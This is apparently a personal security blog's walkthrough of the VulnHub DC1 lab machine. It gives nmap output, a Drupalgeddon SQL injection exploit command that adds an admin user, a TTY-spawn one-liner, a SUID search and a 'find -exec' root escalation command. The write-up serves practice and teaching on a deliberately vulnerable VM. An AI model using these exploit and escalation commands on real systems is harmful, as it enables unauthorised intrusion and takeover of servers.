Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

Yet again today we be working on another OSCP like box DC1 On vulnhub you can grab a copy here Download DC1 .

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Sun May 16 15:48:28 2021 as: nmap -sC -sV -oA nmap 172.16.109.134
Nmap scan report for 172.16.109.134
Host is up (0.00017s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33474/tcp6  status
|   100024  1          40386/udp6  status
|   100024  1          43432/tcp   status
|_  100024  1          51414/udp   status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 16 15:48:40 2021 -- 1 IP address (1 host up) scanned in 11.71 seconds

3 open ports interesting let check port 80 i can already see it running drupal 7 on the nmap scan probably easy lol so i quickly use searchsploit drupal 7 to find exploit.

image

Seems we have some cool exploits for drupal 7 let try using Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) yes adding another admin user with the help of SQL Injection.

python 34992.py -t http://172.16.109.134/ -u muzec -p muzec

image

And user created let use it to log in .

image

We are in now let try and get a reverse shell .

NOTE:- if you are having a problem getting a reverse kindly read my latest writeup on drupal reverse shell here DroopyCTF Writeup .

image

Clicking on save give us back a reverse shell .

image

Now let spawn a TTY shell python -c 'import pty; pty.spawn ("/bin/bash")' .

image

Privilege Escalation

Checking for SUID permission that can lead to root find / -perm -u=s -type f 2>/dev/null and we have /usr/bin/find let check gtfobins .

image

image

And we have /usr/bin/find . -exec /bin/bash -p \; -quit running it give us root .

image

Box rooted and we are done.

Greeting From Muzec



Back To Home